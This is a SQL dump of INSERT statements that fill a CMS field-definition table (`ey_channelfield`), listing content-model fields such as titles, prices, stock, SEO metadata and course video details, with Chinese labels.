INSERT INTO `ey_channelfield` VALUES ('45', 'dirpath', '-99', '目录存放HTML路径', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('46', 'dirname', '-99', '目录英文名', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('47', 'typename', '-99', '栏目名称', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('48', 'parent_id', '-99', '栏目上级ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('49', 'current_channel', '-99', '栏目当前模型ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('50', 'channeltype', '-99', '栏目顶级模型ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('51', 'id', '-99', '栏目ID', 'int', 'int(10)', '10', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533524780', '1533524780', '0');
INSERT INTO `ey_channelfield` VALUES ('52', 'del_method', '-99', '伪删除状态,1为主动删除,2为跟随上级栏目被动删除', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('53', 'is_del', '0', '伪删除,1=是,0=否', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('54', 'del_method', '0', '伪删除状态,1为主动删除,2为跟随上级栏目被动删除', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('55', 'admin_id', '0', '管理员ID', 'int', 'int(10)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('56', 'lang', '0', '语言标识', 'text', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1547890773', '1547890773', '0');
INSERT INTO `ey_channelfield` VALUES ('57', 'prom_type', '0', '产品类型:0普通产品,1虚拟产品', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('58', 'users_price', '0', '价格', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '0', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('59', 'prom_type', '2', '产品类型:0普通产品,1虚拟产品', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('60', 'users_price', '2', '价格', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '0', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('61', 'users_id', '0', '会员ID', 'int', 'int(11)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('62', 'arc_level_id', '0', '文档会员权限ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('63', 'arc_level_id', '4', '文档会员权限ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('64', 'weapp_code', '-99', '插件栏目唯一标识', 'text', 'varchar(200)', '200', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('65', 'is_release', '-99', '栏目是否应用于会员投稿发布,1是,0否', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('66', 'old_price', '0', '产品旧价', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('67', 'stock_count', '0', '商品库存量', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('68', 'stock_show', '0', '商品库存在产品详情页是否显示,1为显示,0为不显示', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('69', 'joinaid', '0', '关联文档ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('70', 'downcount', '0', '下载次数', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('71', 'downcount', '4', '下载次数', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('72', 'htmlfilename', '0', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('73', 'htmlfilename', '1', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('74', 'htmlfilename', '2', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('75', 'htmlfilename', '3', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('76', 'htmlfilename', '4', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('77', 'htmlfilename', '6', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1557042574', '0');
INSERT INTO `ey_channelfield` VALUES ('78', 'attrlist_id', '0', '参数列表ID', 'int', 'int(10) unsigned', '10', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091930', '1533091930', '0');
INSERT INTO `ey_channelfield` VALUES ('79', 'sales_num', '0', '销售量', 'int', 'int(10) unsigned', '10', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533091930', '1533091930', '0');
INSERT INTO `ey_channelfield` VALUES ('81', 'topid', '-99', '顶级栏目ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1557042574', '1613986047', '0');
INSERT INTO `ey_channelfield` VALUES ('82', 'is_slide', '0', '是否幻灯', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092420', '1533092420', '0');
INSERT INTO `ey_channelfield` VALUES ('83', 'is_roll', '0', '是否幻灯', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092420', '1533092420', '0');
INSERT INTO `ey_channelfield` VALUES ('84', 'is_diyattr', '0', '是否自定义', 'switch', 'tinyint(1)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1533092420', '1533092420', '0');
INSERT INTO `ey_channelfield` VALUES ('85', 'update_time', '5', '更新时间', 'datetime', 'int(11)', '11', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('86', 'add_time', '5', '新增时间', 'datetime', 'int(11)', '11', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('87', 'htmlfilename', '5', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('88', 'downcount', '5', '下载次数', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('89', 'joinaid', '5', '关联文档ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('90', 'del_method', '5', '伪删除状态,1为主动删除,2为跟随上级栏目被动删除', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('91', 'is_del', '5', '伪删除,1=是,0=否', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('92', 'arc_level_id', '5', '文档会员权限ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('93', 'users_id', '5', '会员ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('94', 'admin_id', '5', '管理员ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('95', 'lang', '5', '语言标识', 'text', 'varchar(50)', '50', 'cn', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('96', 'sort_order', '5', '排序号', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('97', 'status', '5', '状态(0=屏蔽,1=正常)', 'switch', 'tinyint(1)', '1', '1', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('98', 'tempview', '5', '文档模板文件名', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('99', 'prom_type', '5', '产品类型:0=普通产品,1=虚拟(默认手动发货),2=虚拟(网盘', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('100', 'stock_show', '5', '商品库存在产品详情页是否显示,1为显示,0为不显示', 'switch', 'tinyint(1) unsigned', '1', '1', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('101', 'stock_count', '5', '商品库存量', 'int', 'int(10) unsigned', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('102', 'sales_num', '5', '销售量', 'int', 'int(10) unsigned', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('103', 'old_price', '5', '产品旧价', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('104', 'users_free', '5', '是否会员免费,默认0不免费,1为免费', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('105', 'users_price', '5', '会员价', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('106', 'attrlist_id', '5', '参数列表ID', 'int', 'int(10) unsigned', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('107', 'seo_description', '5', 'SEO描述', 'multitext', 'text', '0', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('108', 'seo_keywords', '5', 'SEO关键词', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('109', 'seo_title', '5', 'SEO标题', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('110', 'ismake', '5', '是否静态页面(0=动态,1=静态)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('111', 'jumplinks', '5', '外链跳转', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('112', 'arcrank', '5', '阅读权限:0=开放浏览,-1=待审核稿件', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('113', 'click', '5', '浏览量', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('114', 'author', '5', '作者', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('115', 'is_diyattr', '5', '自定义(0=否,1=是)', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('116', 'is_slide', '5', '幻灯(0=否,1=是)', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('117', 'is_roll', '5', '滚动(0=否,1=是)', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('118', 'is_litpic', '5', '图片(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('119', 'is_jump', '5', '跳转链接(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('120', 'is_recom', '5', '推荐(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('121', 'is_top', '5', '置顶(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('122', 'is_special', '5', '特荐(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('123', 'is_head', '5', '头条(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('124', 'litpic', '5', '缩略图', 'img', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('125', 'title', '5', '标题', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('126', 'is_b', '5', '加粗', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('127', 'channel', '5', '模型ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('128', 'typeid', '5', '当前栏目', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('129', 'aid', '5', 'aid', 'int', 'int(10)', '10', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('130', 'content', '5', '内容详情', 'htmltext', 'longtext', '0', '', '', '', '0', '1', '1', '0', '1', '0', '0', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('131', 'courseware', '5', '课件地址', 'text', 'varchar(200)', '200', '', '', '', '0', '1', '0', '0', '1', '0', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('132', 'courseware_free', '5', '课件收费', 'select', 'enum(\'免费\',\'收费\')', '0', '免费,收费', '', '', '0', '1', '0', '0', '1', '0', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('133', 'total_duration', '5', '视频总时长', 'int', 'int(10)', '10', '0', '', '', '0', '1', '0', '0', '1', '0', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('134', 'total_video', '5', '视频数', 'int', 'int(10)', '10', '0', '', '', '0', '1', '0', '0', '1', '0', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('135', 'update_time', '7', '更新时间', 'datetime', 'int(11)', '11', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('136', 'add_time', '7', '新增时间', 'datetime', 'int(11)', '11', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('137', 'htmlfilename', '7', '自定义文件名', 'text', 'varchar(50)', '50', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('138', 'downcount', '7', '下载次数', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('139', 'joinaid', '7', '关联文档ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('140', 'del_method', '7', '伪删除状态,1为主动删除,2为跟随上级栏目被动删除', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('141', 'is_del', '7', '伪删除,1=是,0=否', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('142', 'arc_level_id', '7', '文档会员权限ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('143', 'users_id', '7', '会员ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('144', 'admin_id', '7', '管理员ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('145', 'lang', '7', '语言标识', 'text', 'varchar(50)', '50', 'cn', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('146', 'sort_order', '7', '排序号', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('147', 'status', '7', '状态(0=屏蔽,1=正常)', 'switch', 'tinyint(1)', '1', '1', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('148', 'tempview', '7', '文档模板文件名', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('149', 'prom_type', '7', '产品类型:0=普通产品,1=虚拟(默认手动发货),2=虚拟(网盘', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('150', 'stock_show', '7', '商品库存在产品详情页是否显示,1为显示,0为不显示', 'switch', 'tinyint(1) unsigned', '1', '1', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('151', 'stock_count', '7', '商品库存量', 'int', 'int(10) unsigned', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('152', 'sales_num', '7', '销售量', 'int', 'int(10) unsigned', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('153', 'old_price', '7', '产品旧价', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('154', 'users_free', '7', '是否会员免费,默认0不免费,1为免费', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('155', 'users_price', '7', '会员价', 'decimal', 'decimal(10,2)', '10', '0.00', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('156', 'attrlist_id', '7', '参数列表ID', 'int', 'int(10) unsigned', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('157', 'seo_description', '7', 'SEO描述', 'multitext', 'text', '0', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('158', 'seo_keywords', '7', 'SEO关键词', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('159', 'seo_title', '7', 'SEO标题', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('160', 'ismake', '7', '是否静态页面(0=动态,1=静态)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('161', 'jumplinks', '7', '外链跳转', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('162', 'arcrank', '7', '阅读权限:0=开放浏览,-1=待审核稿件', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('163', 'click', '7', '浏览量', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('164', 'author', '7', '作者', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('165', 'is_diyattr', '7', '自定义(0=否,1=是)', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('166', 'is_slide', '7', '幻灯(0=否,1=是)', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('167', 'is_roll', '7', '滚动(0=否,1=是)', 'switch', 'tinyint(1) unsigned', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('168', 'is_litpic', '7', '图片(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('169', 'is_jump', '7', '跳转链接(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('170', 'is_recom', '7', '推荐(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('171', 'is_top', '7', '置顶(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('172', 'is_special', '7', '特荐(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('173', 'is_head', '7', '头条(0=否,1=是)', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('174', 'litpic', '7', '缩略图', 'img', 'varchar(250)', '250', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('175', 'title', '7', '标题', 'text', 'varchar(200)', '200', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('176', 'is_b', '7', '加粗', 'switch', 'tinyint(1)', '1', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('177', 'channel', '7', '模型ID', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('178', 'typeid', '7', '当前栏目', 'int', 'int(10)', '10', '0', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
INSERT INTO `ey_channelfield` VALUES ('179', 'aid', '7', 'aid', 'int', 'int(10)', '10', '', '', '', '0', '0', '1', '0', '1', '1', '1', '100', '1', '1651715309', '1651715309', '0');
